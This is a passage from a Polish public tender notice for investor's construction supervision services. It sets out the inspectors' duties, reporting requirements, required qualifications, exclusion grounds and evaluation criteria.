53)	     przegląd kompletnej dokumentacji powykonawczej, a następnie dostarczenie jej do Zamawiającego oraz dokumentacji związanej z nadzorowana budową  w formie i terminie ustalonym wspólnie z Zamawiającym;
54)	     przygotowywania niezbędnych dokumentów do uzyskania przez Zamawiającego pozwolenia na użytkowanie, o ile jest wymagane;
55)	     dokonywania inspekcji i nadzór nad robotami zaległymi oraz robotami niezbędnymi do usunięcia wad;
56)	    odbioru wykonanych robót związanych z usunięciem wad;
57)	    wspierania Zamawiającego w negocjacjach dotyczących nierozstrzygniętych roszczeń i sporów;
58)	    dokonania odbioru końcowego i przekazanie obiektu do eksploatacji po uzgodnieniu 
z Kierownikiem Robót ,
59)	    przygotowania końcowego rozliczenia zadania inwestycyjnego i sporządzenia sprawozdania końcowego z jego realizacji.
2.    Inspektor Nadzoru Inwestorskiego w porozumieniu z Projektantem będzie decydować o:
1)	dopuszczeniu materiałów, prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót; 
2)	zatwierdzeniu receptur i technologii proponowanych przez Wykonawcę robót;
3)	wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie 
z wymaganiami umowy zawartej z Wykonawcą robót;
4)	wprowadzeniu zmian w dokumentacji projektowej,
O powyższych decyzjach Inspektor Nadzoru Inwestorskiego będzie niezwłocznie informować Zamawiającego.
3.    Inspektor Nadzoru Inwestorskiego  będzie wnioskować do Zamawiającego o:
1)	zlecenie usunięcia wad stronie trzeciej w przypadku, gdy Wykonawca robót budowlanych nie usunie ich w wyznaczonym terminie;
2)	zmianę terminu wykonania robót w umowie o roboty budowlane, kiedy zmiana taka nie wynika 
z winy czy zaniedbań Wykonawcy robót budowlanych;
3)	udzielenie  robót  dodatkowych niezbędnych do prawidłowej realizacji zamówienia podstawowego, zgodnie z ustawą pzp.

Etap po zakończeniu robót.
Po zakończeniu robót budowlanych Inspektor Nadzoru Inwestycyjnego, potwierdzi gotowość obiektu do dokonania przez Zamawiającego komisyjnego odbioru końcowego.
Inspektor Nadzoru Inwestycyjnego wyegzekwuje od Wykonawcy robót przygotowanie Operatu Kolaudacyjnego (Odbiorowego) wraz z jego sprawdzeniem i zadba o dostarczenie przez Wykonawcę robót wszelkich niezbędnych dokumentów, a także sprawdzi i potwierdzi gotowość obiektu do dokonania przez Zamawiającego komisyjnego odbioru końcowego.  
W okresie rękojmi, Inspektor Nadzoru Inwestycyjnego jest zobowiązany i upoważniony do:
1)	reprezentowania Zamawiającego w kontaktach z osobami trzecimi w sprawach związanych 
z przeglądami wykonanych robót oraz usuwaniem wad, które ujawnią się w okresie rękojmi;
2)	prowadzenia regularnych przeglądów wykonanych robót (co najmniej 2 razy w roku) z udziałem Kierownika Robót i przedstawicieli Wykonawcy robót budowlanych  i sporządzania protokołów 
z przeglądów;
3)	wystawiania Wykonawcy robót budowlanych  polecenia usunięcia wad, które zostaną ujawnione w trakcie przeglądów i wyznaczania terminów ich usunięcia;
4)	nadzoru nad robotami niezbędnymi do usunięcia wad;
5)	odbioru wykonanych robót związanych z usunięciem wad;
6)	wnioskowania do Zamawiającego o zlecenie zastępczego usunięcia wad w przypadku, gdy nie zostaną usunięte przez Wykonawcę robót budowlanych w wyznaczonym terminie;
7)	sprawdzenie i potwierdzenie gotowości obiektu do dokonania przez Zamawiającego komisyjnego odbioru pogwarancyjnego (ostatecznego) wraz z przygotowaniem wszelkich niezbędnych dokumentów;
8)	sporządzenia protokołu odbioru ostatecznego po okresie rękojmi i potwierdzenia usunięcia wszystkich wad ujawnionych w okresie rękojmi;
9)	wspierania Zamawiającego w negocjacjach dotyczących nierozstrzygniętych roszczeń 
i sporów.

III.  Współpraca z Zamawiającym
Na każdym etapie realizacji zadania inwestycyjnego Inspektor Nadzoru Inwestorskiego  zapewni Zamawiającemu wszelką niezbędną pomoc. Inspektor Nadzoru Inwestorskiego, nie może zwolnić którejkolwiek ze stron z jakichkolwiek obowiązków, zobowiązań lub odpowiedzialności wynikających 
z umowy o roboty budowlane. Inspektor Nadzoru Inwestorskiego  niniejszego zamówienia zorganizuje pracę swojego Zespołu w taki sposób, aby zadanie inwestycyjne było realizowane zgodnie ze szczegółowym harmonogramem czasowym, rzeczowym i finansowym.
IV. 	Wymagania od Inspektora Nadzoru Inwestorskiego
1.	Personel
Nadzór nad realizacją zadania inwestycyjnego,  powierzony  będzie osobom wskazanym w ofercie Wykonawcy niniejszego zamówienia. Osoby -   Zespół Inspektora Nadzoru Inwestorskiego, musi spełniając określone w SIWZ wymagania. Wszyscy uczestnicy Zespołu Inspektora Nadzoru Inwestorskiego odgrywają zasadniczą rolę w realizacji nadzoru nad realizowanymi robotami budowlanymi. Należą do nich:
	Inspektor Koordynator - Inspektor nadzoru robót budowlanych 
	Inspektor nadzoru robót sanitarnych
	Inspektor nadzoru robót elektrycznych
Osobą odpowiedzialną za kierowanie zespołem inspektorów będzie Inspektor Koordynator, który może przekazać którykolwiek ze swoich obowiązków i uprawnień zastępcy, po uzyskaniu akceptacji Zamawiającego i po powiadomieniu Wykonawcy robót.
Personel Wykonawcy niniejszego zamówienia będzie wykonywał swoje obowiązki z należytą starannością, a w szczególności będzie:
a)	dokumentował decyzje i rozstrzygnięcia mające wpływ na potwierdzone kwoty; 
b)	przestrzegał prawidłowości rozliczeń rachunkowych; 
c)	dbał o kompletność korespondencji i prawidłowość przedstawianej dokumentacji; 
d)	potwierdzał wyłącznie kwoty, które bezspornie są należne Wykonawcy robót budowlanych, 
a wszelkich kalkulacji dokonywał w oparciu o warunki umowy i zasady oszczędnego gospodarowania środkami publicznymi;
e)	nie dopuszczał do sytuacji, w których jego działania lub zaniechania będą stanowiły podstawę roszczeń Wykonawcy robót budowlanych;
Inspektor Nadzoru Inwestorskiego może przewidzieć zatrudnienie dodatkowych osób, których wynagrodzenie należy uwzględnić w wynagrodzeniu personelu podstawowego.
Przed podpisaniem  umowy Wykonawca dostarczy Zamawiającemu oświadczenia wszystkich inspektorów o przyjęciu obowiązku pełnienia funkcji Inspektora Nadzoru Inwestorskiego, 
a także kopię uprawnień budowlanych do sprawowania samodzielnych funkcji technicznych 
w budownictwie wraz z zaświadczeniem o przynależności do  Izby. 
2. Raporty
Wykonawca niniejszego zamówienia sporządza raporty w czasie trwania Umowy na realizację niniejszego zadania inwestycyjnego w zakresie i terminach określonych poniżej.
1)	Raporty miesięczne 
Inspektor Nadzoru Inwestorskiego do 10-tego każdego miesiąca przedłoży Raport miesięczny" informujący  o postępie robót, uzyskiwanym poziomie jakości robót, sprawach finansowych oraz występujących problemach w realizacji umowy na roboty budowlane.
Raport będzie zawierał:
a)	opis postępu robót i powstałych problemów, propozycje rozwiązania tych problemów,
b)	zaangażowanie sił i środków Wykonawcy robót,
c)	postęp robót w podziale na kategorie robót w powiązaniu z harmonogramem rzeczowo-finansowym,
d)	fotografie (z widocznymi datami) dokumentujące postęp robót,
e)	wykaz roszczeń i etap ich rozpatrzenia.
f)	aktualne szacunki kosztu końcowego na różnych etapach realizacji zadania inwestycyjnego oraz wartość robót dodatkowych,

2)	Raport techniczny
Inspektor Nadzoru Inwestorskiego przygotuje (wtedy, kiedy to konieczne) raport informujący 
o problemach technicznych, jakie wystąpiły w trakcie realizacji robót. Taki raport będzie wymagany, kiedy wystąpią poważne zmiany w dokumentacji projektowej.
3)	Raport dotyczący sporu
Inspektor Nadzoru Inwestorskiego przedłoży Zamawiającemu Raport dotyczący sporu" 
w każdym wypadku, gdy w trakcie realizacji usługi zostanie wszczęty spór między Zamawiającym  
a Wykonawcą robót budowlanych dotyczący realizacji zadania inwestycyjnego.
Każdy Raport dotyczący sporu" zawierał będzie szczegółowy opis zdarzeń i korespondencji dotyczącej sporu (wraz z kalendarium). Do Raportu" powinny być załączone wszelkie istotne dokumenty, które pozwolą na przeanalizowanie przebiegu sporu i stanowisk stron, jeśli nie będzie wynikało to
z korespondencji. Inspektor Nadzoru Inwestorskiego będzie zobowiązany do zawarcia w Raporcie" swego wyraźnego i jednoznacznego stanowiska, co do przedmiotu sporu oraz uzasadnienia dla podejmowanych w związku ze sporem rozstrzygnięć.
4)	Raport końcowy
Po zakończeniu robót, przed odbiorem końcowym, Inspektor Nadzoru Inwestorskiego  przedłoży Zamawiającemu Raport końcowy" zawierający:
1.	Wstęp
1.1.	Krótki opis projektu
2.	Dokumentację Projektową
2.1.	Założenia Projektowe
2.2.	Zmiany projektowe w trakcie realizacji
3.	Wykonawstwo
3.1.	Postęp robót
3.2.	Uwagi do wykonania poszczególnych głównych elementów robót
3.3.	Osiągnięta jakość robót w zgodności ze Specyfikacjami Technicznymi
           Wykonania i Odbioru Robót Budowlanych 
3.4	Przyczyny wystąpienia wad
4.	Sprawy umowy o roboty budowlane i zmiany
4.1.	Czas trwania umowy o roboty budowlane
4.2.	Roszczenia
5.	Sprawy finansowe
5.1.	Przyczyny zmiany ceny umownej wykonawcy
5.2.	Końcowe rozliczenie ilościowe wykonanych robót
6.	Uwagi i wnioski z przebiegu realizacji zadania inwestycyjnego  dotyczące:
6.1.	Dokumentacji projektowej
6.2.	Warunków realizacji zadania inwestycyjnego
6.3.	Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych 
6.4.	Czasu trwania umowy o roboty budowlane
6.5.	Technologii robót
6.6.	  Rekomendacji na przyszłe, podobne projekty.

W okresie rękojmi, Inspektor Nadzoru Inwestorskiego jest zobowiązany do przekazywania Zamawiającemu raportów z przeprowadzonych przeglądów robót zrealizowanych w ramach zawartej umowy oraz usunięcia przez Wykonawcę robót budowlanych wad ujawnionych w okresie rękojmi.

<br /><br /><b>II.5) Główny kod CPV: </b>71520000-9<br /><b> Dodatkowe kody CPV:</b>71540000-5,
                71247000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Wymóg zatrudnienia na podstawie umowy o pracę:
Zamawiający nie określa wymagań, o których mowa w art. 29 ust. 3a i 4  ustawy Pzp oraz nie stawia zastrzeżeń,  o których mowa w art. 36 a ust.2 Pzp.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Osób zdolnych do wykonania zamówienia :
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobą zdolną do wykonania zamówienia. Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobą/osobami niezbędną/niezbędnymi do wykonania niniejszego zamówienia tj. posiadającą/ymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie;

Kwalifikacje Zespołu Inspektora Nadzoru Inwestycyjnego
a)	Inspektor robót budowlanych  Inspektor koordynator (1 osoba) posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej  bez ograniczeń bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika budowy lub inspektora nadzoru w zakresie objętym dokumentacją projektową, posiadającym co najmniej 3 letnie doświadczenie zawodowe, jako kierownik budowy lub inspektor nadzoru, w tym wykaże, że wykonywał 1 usługę nadzoru inwestorskiego lub kierowania  robotami budowlanymi polegającymi 
w szczególności na budowie, rozbudowie, nadbudowie, przebudowie, modernizacji, adaptacji lub remoncie obiektu kubaturowego (zwierającymi prace ocieplenia ścian zewnętrznych), o wartości robót budowlanych na kwotę minimum 500 000,00 zł brutto;
b)	Inspektor robót sanitarnych (1 osoba) posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót sanitarnych lub inspektora nadzoru w zakresie objętym dokumentacją projektową, posiadającym co najmniej 3 letnie doświadczenie zawodowe, jako kierownik budowy lub inspektor nadzoru, w tym wykaże, że  wykonywał 1 usługę nadzoru inwestorskiego lub kierowania  robotami budowlanymi polegającymi na wykonaniu lub modernizacji kotłowni w zakresie technologii wraz z modernizacją systemu c.o. o wartości minimum 400 000,00 zł brutto;
c)	Inspektor robót elektrycznych (1 osoba) posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót elektrycznych lub inspektora nadzoru w zakresie objętym dokumentacją projektową posiadającym co najmniej 3 letnie doświadczenie zawodowe, jako kierownik budowy lub inspektor nadzoru. 

Zamawiający dopuszcza łączenie specjalności wskazanych wyżej przez osoby posiadające powyższe wymagane uprawnienia. Osoba wskazana do pełnienia obu funkcji musi spełniać wymagania dla obu łączonych funkcji.

Zamawiający ocenia, czy udostępnione wykonawcy przez inne podmioty ich zdolności techniczne i zawodowe pozwalają na wykazanie przez wykonawcę spełnienia warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust.1 pkt 13-22 i ust.5.
Jeżeli zdolności techniczne i zawodowe podmiotu, o którym mowa powyżej, nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego:
a)	zastąpił ten podmiot innym podmiotem lub podmiotami, lub
b)	zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże sytuację techniczną i zawodową,  o której mowa powyżej.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy :
1)	nie podlegają wykluczeniu z postępowania.
Ocena potwierdzenia spełniania braku podstaw wykluczenia  zostanie wstępnie dokonana przez zamawiającego na podstawie złożonego oświadczenia wg wzoru załącznika Nr 3 do SIWZ, na zasadzie spełnia/nie spełnia.
2)	spełniają warunki udziału w postępowaniu.
Ocena potwierdzenia spełniania warunków  zostanie wstępnie dokonana przez zamawiającego na podstawie złożonego oświadczenia wg wzoru załącznika Nr 2 do SIWZ, na zasadzie spełnia/nie spełnia.
Wykonawca, którego oferta zostanie najwyżej oceniona na podstawie kryteriów oceny ofert, na wezwanie zamawiającego we wskazanym przez niego terminie, jednak nie krótszym niż  5 dni, zobowiązany będzie do przedłożenia dokumentów potwierdzających brak podstaw do wykluczenia z postępowania oraz potwierdzających spełnianie warunków udziału w postępowaniu, aktualnych na dzień złożenia tych dokumentów.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że :
1)	w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia 
z postępowania na podstawie art. 24 ust. 1 i 5 ustawy Pzp;
2)	łącznie spełniają warunki udziału w postępowaniu dotyczące zdolności technicznych lub zawodowych;
3)	w stosunku do żadnego z nich nie zachodzą przesłanki do wykluczenia 
z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">
odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;
 </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 3 ustawy Pzp (informację z sesji otwarcia ofert) przekaże zamawiającemu, oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej o której mowa w art. 24 ust.1 pkt 23 ustawy Pzp ( załącznik nr 5 do SIWZ). 

1.	Na ofertę składają się :
1)	wypełniony  załącznik nr 1  Formularz ofertowy;
2)	wypełniony załącznik Nr 2  Oświadczenie o spełnianiu warunków udziału 
wypełniony załącznik Nr 3  Oświadczenie o braku podstaw do wykluczenia
z postępowania;
3)	wypełniony załącznik nr 3a  Oświadczenie o braku podstaw do wykluczenia 
z postępowania (dot. podmiotów trzecich i podwykonawców);
4)	wypełniony/e załącznik/i Nr 4  Zobowiązanie podmiotu udostępniającego swoje zasoby wykonawcy (jeżeli występują);
5)	 w przypadku wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td> cena ofertowa </td><td>60</td></tr><tr><td>jakość - termin przybycia na czas budowy </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Niedopuszczalna jest pod rygorem nieważności zmiana istotnych postanowień zawartej umowy.
2. Zmiana postanowień umowy w formie pisemnego aneksu może nastąpić na zasadach określonych w art. 144 ust 1 pkt 2-6 ustawy Pzp, w tym przypadku:
1) zmiany przepisów prawa powszechnie obowiązujących, w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
2) zmiany warunków gospodarczych;
3) zaistnienia obiektywnych, niezależnych od stron przeszkód w realizacji umowy zawartej w wyniku udzielonego zamówienia;
4) zmiany osób przewidzianych do realizacji zamówienia  jeśli  wynikać to będzie z okoliczności o charakterze obiektywnym, których nie można było przewidzieć w chwili składania oferty, pod warunkiem, że nowe osoby wskazane przez Wykonawcę spełniają warunki określone w Rozdziale VI SIWZ.
